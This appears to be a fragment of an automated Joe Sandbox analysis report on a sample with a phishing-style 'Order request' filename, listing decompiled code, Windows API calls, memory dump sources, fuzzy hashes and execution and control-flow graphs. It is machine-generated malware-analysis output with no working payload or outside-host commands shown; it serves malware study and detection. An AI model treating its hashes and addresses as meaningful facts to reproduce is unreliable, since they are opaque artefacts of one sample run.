                                                              • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                              • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00405B6C(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                              				int _v8;
                                                              				int _t12;
                                                              				int _t14;
                                                              				int _t15;
                                                              				CHAR* _t17;
                                                              				CHAR* _t27;
                                                              
                                                              				_t12 = lstrlenA(_a8);
                                                              				_t27 = _a4;
                                                              				_v8 = _t12;
                                                              				while(lstrlenA(_t27) >= _v8) {
                                                              					_t14 = _v8;
                                                              					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                              					_t15 = lstrcmpiA(_t27, _a8);
                                                              					_t27[_v8] =  *(_t14 + _t27);
                                                              					if(_t15 == 0) {
                                                              						_t17 = _t27;
                                                              					} else {
                                                              						_t27 = CharNextA(_t27);
                                                              						continue;
                                                              					}
                                                              					L5:
                                                              					return _t17;
                                                              				}
                                                              				_t17 = 0;
                                                              				goto L5;
                                                              			}









                                                              0x00405b7c
                                                              0x00405b7e
                                                              0x00405b81
                                                              0x00405bad
                                                              0x00405b86
                                                              0x00405b8f
                                                              0x00405b94
                                                              0x00405b9f
                                                              0x00405ba2
                                                              0x00405bbe
                                                              0x00405ba4
                                                              0x00405bab
                                                              0x00000000
                                                              0x00405bab
                                                              0x00405bb7
                                                              0x00405bbb
                                                              0x00405bbb
                                                              0x00405bb5
                                                              0x00000000

                                                              APIs
                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405B7C
                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B94
                                                              • CharNextA.USER32(00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405BA5
                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405BAE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                              • String ID:
                                                              • API String ID: 190613189-0
                                                              • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                              • Instruction ID: 7563504597b604d9a211119aa68f0a7f164f23f923bb21cff999b965ed3bd4a6
                                                              • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                              • Instruction Fuzzy Hash: DCF0C231105818AFD7029FA5DD0099FBBB8EF55250B2540A9E840F7210D674FE019B68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:11%
                                                              Dynamic/Decrypted Code Coverage:99.1%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:219
                                                              Total number of Limit Nodes:23
                                                              execution_graph 50052 1543340 50053 1543355 50052->50053 50054 1543634 50053->50054 50055 1543890 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 50053->50055 50056 1543880 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 50053->50056 50057 1543958 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 50053->50057 50061 1543650 50053->50061 50068 15437c8 50053->50068 50072 1543abc 50053->50072 50055->50053 50056->50053 50057->50053 50062 154366e 50061->50062 50063 1543691 50061->50063 50062->50053 50064 15436b6 50063->50064 50077 1543890 50063->50077 50086 1543880 50063->50086 50064->50053 50065 15437ef 50065->50053 50070 1543890 3 API calls 50068->50070 50071 1543880 3 API calls 50068->50071 50069 15437ef 50069->50053 50070->50069 50071->50069 50073 1543abd 50072->50073 50074 1543aff 50073->50074 50075 1543c58 3 API calls 50073->50075 50076 1543c48 3 API calls 50073->50076 50074->50053 50075->50074 50076->50074 50078 15438a4 50077->50078 50079 15438e5 50077->50079 50078->50079 50080 15439fe 50078->50080 50083 1543a0d 50078->50083 50079->50065 50081 15437c8 3 API calls 50080->50081 50082 1543a05 50081->50082 50082->50065 50083->50082 50095 1543c58 50083->50095 50099 1543c48 50083->50099 50087 15438e5 50086->50087 50088 15438a4 50086->50088 50087->50065 50088->50087 50089 15439fe 50088->50089 50092 1543a0d 50088->50092 50090 15437c8 3 API calls 50089->50090 50091 1543a05 50090->50091 50091->50065 50092->50091 50093 1543c58 3 API calls 50092->50093 50094 1543c48 3 API calls 50092->50094 50093->50091 50094->50091 50103 1543c90 50095->50103 50111 1543c80 50095->50111 50096 1543c66 50096->50082 50100 1543c66 50099->50100 50101 1543c90 2 API calls 50099->50101 50102 1543c80 2 API calls 50099->50102 50100->50082 50101->50100 50102->50100 50104 1543cc5 50103->50104 50105 1543c9d 50103->50105 50119 154097c 50104->50119 50105->50096 50108 1543ce6 50108->50096 50109 1543dae GlobalMemoryStatusEx 50110 1543dde 50109->50110 50110->50096 50112 1543c90 50111->50112 50113 1543c9d 50112->50113 50114 154097c GlobalMemoryStatusEx 50112->50114 50113->50096 50116 1543ce2 50114->50116 50115 1543ce6 50115->50096 50116->50115 50117 1543dae GlobalMemoryStatusEx 50116->50117 50118 1543dde 50117->50118 50118->50096 50120 1543d68 GlobalMemoryStatusEx 50119->50120 50122 1543ce2 50120->50122 50122->50108 50122->50109 49990 1d301ab8 49991 1d301ae7 49990->49991 49994 1d300824 49991->49994 49993 1d301c0c 49995 1d30082f 49994->49995 49996 1d30212a 49995->49996 49999 1d3048a0 49995->49999 50008 1d304892 49995->50008 49996->49993 50000 1d3048cb 49999->50000 50017 1d3037b8 50000->50017 50003 1d30494e 50005 1d30497a 50003->50005 50026 1d3037c8 50003->50026 50007 1d3037b8 2 API calls 50007->50003 50009 1d3048cb 50008->50009 50010 1d3037b8 2 API calls 50009->50010 50011 1d304932 50010->50011 50015 1d304dd0 2 API calls 50011->50015 50016 1d3037b8 2 API calls 50011->50016 50012 1d30494e 50013 1d3037c8 GetModuleHandleW 50012->50013 50014 1d30497a 50012->50014 50013->50014 50015->50012 50016->50012 50018 1d3037c3 50017->50018 50019 1d304932 50018->50019 50030 1d304fe0 50018->50030 50019->50007 50021 1d304dd0 50019->50021 50022 1d304deb 50021->50022 50023 1d304def 50021->50023 50022->50003 50024 1d304f2e 50023->50024 50025 1d304fe0 2 API calls 50023->50025 50025->50024 50027 1d305350 GetModuleHandleW 50026->50027 50029 1d3053c5 50027->50029 50029->50005 50031 1d305005 50030->50031 50032 1d3037c8 GetModuleHandleW 50031->50032 50033 1d30504a 50031->50033 50032->50033 50034 1d3037c8 GetModuleHandleW 50033->50034 50042 1d305216 50033->50042 50036 1d30519b 50034->50036 50035 1d305271 50035->50019 50036->50035 50039 1d3037c8 GetModuleHandleW 50036->50039 50036->50042 50037 1d305398 GetModuleHandleW 50038 1d3053c5 50037->50038 50038->50019 50040 1d3051e9 50039->50040 50041 1d3037c8 GetModuleHandleW 50040->50041 50040->50042 50041->50042 50042->50019 50042->50035 50042->50037 50127 1d30a308 50128 1d30a34e GetCurrentProcess 50127->50128 50130 1d30a3a0 GetCurrentThread 50128->50130 50131 1d30a399 50128->50131 50132 1d30a3d6 50130->50132 50133 1d30a3dd GetCurrentProcess 50130->50133 50131->50130 50132->50133 50134 1d30a413 50133->50134 50138 1d30a4da 50134->50138 50135 1d30a43b GetCurrentThreadId 50136 1d30a46c 50135->50136 50139 1d30a4e3 50138->50139 50140 1d30a549 DuplicateHandle 50138->50140 50139->50135 50142 1d30a5e6 50140->50142 50142->50135 50245 1d3067f8 50246 1d306860 CreateWindowExW 50245->50246 50248 1d30691c 50246->50248 50043 149e740 50047 149e75f 50043->50047 50044 149e9c8 50046 149a0e8 RegQueryValueExW 50046->50047 50047->50044 50047->50046 50048 149a0dc 50047->50048 50049 149ee50 RegOpenKeyExW 50048->50049 50051 149ef16 50049->50051 50143 1d25d01c 50144 1d25d034 50143->50144 50145 1d25d08e 50144->50145 50151 1d3069b0 50144->50151 50157 1d30469c 50144->50157 50168 1d30468c 50144->50168 50172 1d30b142 50144->50172 50184 1d3069a0 50144->50184 50152 1d3069d6 50151->50152 50153 1d30468c 2 API calls 50152->50153 50154 1d3069e2 50153->50154 50155 1d30469c 2 API calls 50154->50155 50156 1d3069f7 50155->50156 50156->50145 50158 1d3046a7 50157->50158 50159 1d30b1c9 50158->50159 50161 1d30b1b9 50158->50161 50214 1d30a144 50159->50214 50190 1d30b2f0 50161->50190 50194 154cc48 50161->50194 50199 154cc58 50161->50199 50204 154cd24 50161->50204 50210 1d30b2e0 50161->50210 50162 1d30b1c7 50169 1d304697 50168->50169 50237 1d3046c4 50169->50237 50171 1d306ae7 50171->50145 50173 1d30b162 50172->50173 50175 1d30b0e6 50172->50175 50174 1d30b1c9 50173->50174 50177 1d30b1b9 50173->50177 50176 1d30a144 2 API calls 50174->50176 50175->50145 50178 1d30b1c7 50176->50178 50179 1d30b2f0 2 API calls 50177->50179 50180 1d30b2e0 2 API calls 50177->50180 50181 154cd24 2 API calls 50177->50181 50182 154cc58 2 API calls 50177->50182 50183 154cc48 2 API calls 50177->50183 50179->50178 50180->50178 50181->50178 50182->50178 50183->50178 50185 1d3069b0 50184->50185 50186 1d30468c 2 API calls 50185->50186 50187 1d3069e2 50186->50187 50188 1d30469c 2 API calls 50187->50188 50189 1d3069f7 50188->50189 50189->50145 50192 1d30b2fe 50190->50192 50191 1d30a144 2 API calls 50191->50192 50192->50191 50193 1d30b3e7 50192->50193 50193->50162 50195 154cc6c 50194->50195 50221 154cd10 50195->50221 50224 154cd00 50195->50224 50196 154ccf8 50196->50162 50201 154cc6c 50199->50201 50200 154ccf8 50200->50162 50202 154cd10 2 API calls 50201->50202 50203 154cd00 2 API calls 50201->50203 50202->50200 50203->50200 50205 154cce2 50204->50205 50206 154cd32 50204->50206 50208 154cd10 2 API calls 50205->50208 50209 154cd00 2 API calls 50205->50209 50207 154ccf8 50207->50162 50208->50207 50209->50207 50212 1d30b2fe 50210->50212 50211 1d30a144 2 API calls 50211->50212 50212->50211 50213 1d30b3e7 50212->50213 50213->50162 50215 1d30a14f 50214->50215 50216 1d30b504 50215->50216 50217 1d30b45a 50215->50217 50218 1d30469c CallWindowProcW 50216->50218 50219 1d30b4b2 CallWindowProcW 50217->50219 50220 1d30b461 50217->50220 50218->50220 50219->50220 50220->50162 50222 154cd21 50221->50222 50227 154e140 50221->50227 50222->50196 50225 154cd21 50224->50225 50226 154e140 2 API calls 50224->50226 50225->50196 50226->50225 50229 1d30a144 2 API calls 50227->50229 50231 1d30b408 50227->50231 50228 154e15a 50228->50222 50229->50228 50232 1d30b504 50231->50232 50233 1d30b45a 50231->50233 50234 1d30469c CallWindowProcW 50232->50234 50235 1d30b4b2 CallWindowProcW 50233->50235 50236 1d30b461 50233->50236 50234->50236 50235->50236 50236->50228 50238 1d3046cf 50237->50238 50239 1d3037b8 2 API calls 50238->50239 50240 1d306b49 50239->50240 50241 1d3037c8 GetModuleHandleW 50240->50241 50242 1d306bb7 50240->50242 50241->50242 50123 137bfa8 50124 137bfc7 50123->50124 50125 137bffb LdrInitializeThunk 50124->50125 50126 137c018 50125->50126 50243 f0eb4f TerminateThread 50244 f0eb6a 50243->50244 50249 137b768 50250 137b787 LdrInitializeThunk 50249->50250 50252 137b7bb 50250->50252

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 1D30A386
                                                              • GetCurrentThread.KERNEL32 ref: 1D30A3C3
                                                              • GetCurrentProcess.KERNEL32 ref: 1D30A400
                                                              • GetCurrentThreadId.KERNEL32 ref: 1D30A459
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67442266637.000000001D300000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D300000, based on PE: false
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: f389441897519260900e5c26437d77f005181a7c3faee7ac8f4f089103e05567
                                                              • Instruction ID: 47ee5b6bd53eba64ca0f853f01991a425fd093d25e91112fb7d6b8ac0422c990
                                                              • Opcode Fuzzy Hash: f389441897519260900e5c26437d77f005181a7c3faee7ac8f4f089103e05567
                                                              • Instruction Fuzzy Hash: 8161BCB08053498FDB04CFA9D848BEEBFF0AF49314F2486AAD00AA7351D7359945CF62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 1D30A386
                                                              • GetCurrentThread.KERNEL32 ref: 1D30A3C3
                                                              • GetCurrentProcess.KERNEL32 ref: 1D30A400
                                                              • GetCurrentThreadId.KERNEL32 ref: 1D30A459
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67442266637.000000001D300000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D300000, based on PE: false
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 50be025c03efa11d2ea283c9ac607842d2247ba2508d050a7887cf436bbfc1a7
                                                              • Instruction ID: d0a18480fab19f0b907e62e4d4901eb45ab77cf222cb11717f0b131b6b634f63
                                                              • Opcode Fuzzy Hash: 50be025c03efa11d2ea283c9ac607842d2247ba2508d050a7887cf436bbfc1a7
                                                              • Instruction Fuzzy Hash: 2A519CB0D002498FDB04CFA9D548BAEFBF0AF89304F24866DD41AA7750DB35A945CF66
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1710 137baa0-137bb1f 1719 137bb25-137bb2c 1710->1719 1720 137be9d-137bec7 1710->1720 1719->1720 1721 137bb32-137bb39 1719->1721 1724 137beec-137bf05 1720->1724 1725 137bec9-137bed3 1720->1725 1721->1720 1723 137bb3f-137bb46 1721->1723 1723->1720 1726 137bb4c-137bb74 1723->1726 1732 137bf07-137bf17 1724->1732 1733 137bf2c-137bf36 1724->1733 1727 137bed5-137bee6 1725->1727 1728 137bee8-137beeb 1725->1728 1739 137bb7a-137bb8e 1726->1739 1740 137be88-137be92 1726->1740 1727->1728 1734 137bf3c-137bf55 1732->1734 1735 137bf19-137bf23 1732->1735 1738 137bf38-137bf3b 1733->1738 1744 137bf57-137bf67 1734->1744 1745 137bf7c-137bf86 1734->1745 1737 137bf25-137bf27 1735->1737 1735->1738 1737->1733 1739->1740 1746 137bb94-137bb9d 1739->1746 1747 137bf8c-137bfdf call 13795c0 call 13796e0 1744->1747 1748 137bf69-137bf73 1744->1748 1752 137bf88-137bf8b 1745->1752 1749 137be57-137be9c call 1376520 call 13766b0 1746->1749 1750 137bba3-137bbdb 1746->1750 1779 137bfe7-137bfed 1747->1779 1751 137bf75-137bf77 1748->1751 1748->1752 1771 137bdf3-137be06 1750->1771 1772 137bbe1-137bbea 1750->1772 1751->1745 1773 137be1b-137be1f 1771->1773 1775 137be16 1772->1775 1776 137bbf0-137bc37 1772->1776 1777 137be21 1773->1777 1778 137be2a 1773->1778 1775->1773 1797 137bc3d-137bc7a 1776->1797 1798 137bda8-137bdbb 1776->1798 1777->1778 1778->1749 1783 137bff4 1779->1783 1785 137bffb-137c012 LdrInitializeThunk 1783->1785 1786 137c15b-137c178 call 1376520 call 13766b0 1785->1786 1787 137c018-137c032 1785->1787 1812 137c17d-137c186 1786->1812 1787->1786 1792 137c038-137c052 1787->1792 1799 137c054-137c056 1792->1799 1800 137c058 1792->1800 1822 137bced-137bd0c 1797->1822 1823 137bc7c 1797->1823 1801 137bdc7-137bdcb 1798->1801 1803 137c05b-137c0b6 call 137605c 1799->1803 1800->1803 1804 137bdd6-137bdd7 1801->1804 1805 137bdcd 1801->1805 1826 137c0bc 1803->1826 1827 137c0b8-137c0ba 1803->1827 1804->1771 1805->1804 1828 137bdc2 1822->1828 1837 137bd12-137bd3f 1822->1837 1825 137bc7f-137bc85 1823->1825 1825->1828 1829 137bc8b-137bc9b 1825->1829 1831 137c0bf-137c159 call 137605c 1826->1831 1827->1831 1828->1801 1835 137bc9d-137bcb9 1829->1835 1836 137bcdc-137bcdf 1829->1836 1831->1812 1835->1836 1846 137bcbb-137bcd9 1835->1846 1838 137bce5-137bceb 1836->1838 1839 137bdbd 1836->1839 1837->1828 1851 137bd45-137bd72 1837->1851 1838->1822 1838->1825 1839->1828 1846->1836 1851->1828 1861 137bd74-137bda1 1851->1861 1861->1798
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67424855364.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 8b221f76b3bf354b867a59660d1ce24f2b348395bde756fb2366939cda83626f
                                                              • Instruction ID: e1e00694d97916a8b7952f2186c74e04abdebe67e9d971b16ef7603dd70ec448
                                                              • Opcode Fuzzy Hash: 8b221f76b3bf354b867a59660d1ce24f2b348395bde756fb2366939cda83626f
                                                              • Instruction Fuzzy Hash: 0D12B030A042048FCB25DBB4D498AAEBBF2AF85308F15C879D515DB395DB35EC06CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2219 1d304fe0-1d305016 2222 1d305067-1d30506f 2219->2222 2223 1d305018-1d30502f 2219->2223 2224 1d305071-1d305076 call 1d3045d0 2222->2224 2225 1d3050b5-1d3050fe call 1d3045dc 2222->2225 2229 1d305031-1d305037 2223->2229 2230 1d305039 2223->2230 2228 1d30507b-1d3050b0 2224->2228 2248 1d305104-1d30514f 2225->2248 2249 1d3052ab-1d3052dd 2225->2249 2240 1d305152-1d3051ab call 1d3037c8 call 1d3045e8 2228->2240 2232 1d30503f-1d305045 call 1d3037c8 2229->2232 2230->2232 2236 1d30504a-1d305061 call 1d3045c4 2232->2236 2236->2222 2243 1d30527d-1d3052a4 2236->2243 2272 1d3051b0-1d3051b4 2240->2272 2243->2249 2248->2240 2266 1d3052e4-1d30532c 2249->2266 2280 1d30537c-1d305390 2266->2280 2281 1d30532e-1d30533e 2266->2281 2273 1d305271-1d30527c 2272->2273 2274 1d3051ba-1d3051c7 2272->2274 2278 1d30526d-1d30526f 2274->2278 2279 1d3051cd-1d3051fa call 1d3037c8 call 1d3045dc 2274->2279 2278->2266 2278->2273 2279->2278 2293 1d3051fc-1d30520a 2279->2293 2282 1d305392-1d305395 2280->2282 2283 1d305398-1d3053c3 GetModuleHandleW 2280->2283 2281->2280 2282->2283 2285 1d3053c5-1d3053cb 2283->2285 2286 1d3053cc-1d3053e0 2283->2286 2285->2286 2293->2278 2294 1d30520c-1d305223 call 1d3037c8 call 1d3045f4 2293->2294 2299 1d305230-1d30525f call 1d3045e8 2294->2299 2300 1d305225-1d30522e call 1d3045e8 2294->2300 2299->2278 2308 1d305261-1d30526b 2299->2308 2300->2278 2308->2278 2308->2299
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 1D3053B6
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67442266637.000000001D300000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D300000, based on PE: false
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 4c58e9f7ca508c673a034d63b51ecea73d40d553caaea61be04d6d58b8789c70
                                                              • Instruction ID: 90fdddbef4c13e1c4440018ba5ee5b7c3c5ce82e04a042001b2fc044c337e214
                                                              • Opcode Fuzzy Hash: 4c58e9f7ca508c673a034d63b51ecea73d40d553caaea61be04d6d58b8789c70
                                                              • Instruction Fuzzy Hash: DBB18D74A047058FDB08DF79C480A6EBBF5BF88214B118A2DC91ADB751DB34ED45CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2310 137b768-137b7b4 LdrInitializeThunk 2314 137b7bb-137b7c7 2310->2314 2315 137b7cd-137b7d6 2314->2315 2316 137b9ca-137b9dd 2314->2316 2317 137b9ff 2315->2317 2318 137b7dc-137b7f1 2315->2318 2319 137ba04-137ba08 2316->2319 2317->2319 2323 137b7f3-137b806 2318->2323 2324 137b80b-137b826 2318->2324 2320 137ba13 2319->2320 2321 137ba0a 2319->2321 2325 137ba14 2320->2325 2321->2320 2326 137b99e-137b9a2 2323->2326 2333 137b834 2324->2333 2334 137b828-137b832 2324->2334 2325->2325 2328 137b9a4 2326->2328 2329 137b9ad-137b9ae 2326->2329 2328->2329 2329->2316 2335 137b839-137b83b 2333->2335 2334->2335 2336 137b855-137b8ef call 137a550 2335->2336 2337 137b83d-137b850 2335->2337 2356 137b8f1-137b8fb 2336->2356 2357 137b8fd 2336->2357 2337->2326 2358 137b902-137b904 2356->2358 2357->2358 2359 137b906-137b908 2358->2359 2360 137b948-137b99c 2358->2360 2361 137b916 2359->2361 2362 137b90a-137b914 2359->2362 2360->2326 2364 137b91b-137b91d 2361->2364 2362->2364 2364->2360 2365 137b91f-137b946 2364->2365 2365->2360
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67424855364.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: f7d04ffdecfb0bdb33120ffd360abfb1a57e28ec5dad94e23310a6df7b39becb
                                                              • Instruction ID: c1bd772e34ae4385e4cfd070bab6da2fa9c4aa3612df6da19b3a17d9a2499c09
                                                              • Opcode Fuzzy Hash: f7d04ffdecfb0bdb33120ffd360abfb1a57e28ec5dad94e23310a6df7b39becb
                                                              • Instruction Fuzzy Hash: EB616034A10319DFDB24DF74D498BAEBAF1AF85249F108428E41297398DF78A845CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2375 137bfa8-137c012 call 13795c0 call 13796e0 LdrInitializeThunk 2385 137c15b-137c178 call 1376520 call 13766b0 2375->2385 2386 137c018-137c032 2375->2386 2400 137c17d-137c186 2385->2400 2386->2385 2389 137c038-137c052 2386->2389 2393 137c054-137c056 2389->2393 2394 137c058 2389->2394 2396 137c05b-137c0b6 call 137605c 2393->2396 2394->2396 2407 137c0bc 2396->2407 2408 137c0b8-137c0ba 2396->2408 2409 137c0bf-137c159 call 137605c 2407->2409 2408->2409 2409->2400
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67424855364.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 31526903c293775e54f4a465d9d225d36f193d343057b1d9a61002a2e383e820
                                                              • Instruction ID: c73d430bbdb608249969e2deff2e8ad6fdc0ad35a86f3dbb1b4f783ba2866d2c
                                                              • Opcode Fuzzy Hash: 31526903c293775e54f4a465d9d225d36f193d343057b1d9a61002a2e383e820
                                                              • Instruction Fuzzy Hash: 46419271B402059BCB14EFB4D888E9EB7F5AF89208F148939E522DB351DB70EC148B91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2427 1543c90-1543c9b 2428 1543cc5-1543ce4 call 154097c 2427->2428 2429 1543c9d-1543cc4 call 1540970 2427->2429 2435 1543ce6-1543ce9 2428->2435 2436 1543cea-1543d49 2428->2436 2443 1543d4f-1543ddc GlobalMemoryStatusEx 2436->2443 2444 1543d4b-1543d4e 2436->2444 2447 1543de5-1543e0d 2443->2447 2448 1543dde-1543de4 2443->2448 2448->2447
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67425969166.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2ad4c0e754b9987e26303e271e22a896b28f3a894a31107a4003e5bee9b8fc55
                                                              • Instruction ID: 789bf5deb39475487dd09f82cc3901ed9fd5d3091c6743aa199b924dd395e18b
                                                              • Opcode Fuzzy Hash: 2ad4c0e754b9987e26303e271e22a896b28f3a894a31107a4003e5bee9b8fc55
                                                              • Instruction Fuzzy Hash: C7410F32E043559FDB04CFA9C4446EEBBF0BF89324F15856ED548AB251DB389845CBE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2451 1d3067ed-1d30685e 2454 1d306860-1d306866 2451->2454 2455 1d306869-1d306870 2451->2455 2454->2455 2456 1d306872-1d306878 2455->2456 2457 1d30687b-1d3068b3 2455->2457 2456->2457 2458 1d3068bb-1d30691a CreateWindowExW 2457->2458 2459 1d306923-1d30695b 2458->2459 2460 1d30691c-1d306922 2458->2460 2464 1d306968 2459->2464 2465 1d30695d-1d306960 2459->2465 2460->2459 2466 1d306969 2464->2466 2465->2464 2466->2466
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D30690A
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67442266637.000000001D300000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D300000, based on PE: false
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: ab65f36f786f21e5fe754cf84a25e7e4a1bf7e495b69fa34dc9d1c450972f794
                                                              • Instruction ID: 571741374bd6b7c14917c260a034f9da643aac9c81c60f0fc9705db6bc0d4b08
                                                              • Opcode Fuzzy Hash: ab65f36f786f21e5fe754cf84a25e7e4a1bf7e495b69fa34dc9d1c450972f794
                                                              • Instruction Fuzzy Hash: 1D51C3B1D002499FDF14CF99D884ADEBBB5BF88310F24822EE819AB214D7709945CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0149F1C1
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67425499980.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                              Similarity
                                                              • API ID: QueryValue
                                                              • String ID:
                                                              • API String ID: 3660427363-0
                                                              • Opcode ID: 2f4ce9e5966d837b71ba6423ed6d88515b8cf9819137548eaabdab512903ea52
                                                              • Instruction ID: 01cd0aafd5956060a8d26d16ad7c7426e8269da7d5d0d8be3ab11452a846077f
                                                              • Opcode Fuzzy Hash: 2f4ce9e5966d837b71ba6423ed6d88515b8cf9819137548eaabdab512903ea52
                                                              • Instruction Fuzzy Hash: 5F4159B1E042599FCB10CFA9C884A9EBFF5AF49314F15806AE918EB361D7749C09CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D30690A
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67442266637.000000001D300000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D300000, based on PE: false
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 763a7367cdd12fdc179a69c9c34ec38965e5359dd1716dd50fd55c61afe8a58a
                                                              • Instruction ID: 2794e160c64bcdc52893f168077115ba1bb05c8737bab9e368b01a9639ff734d
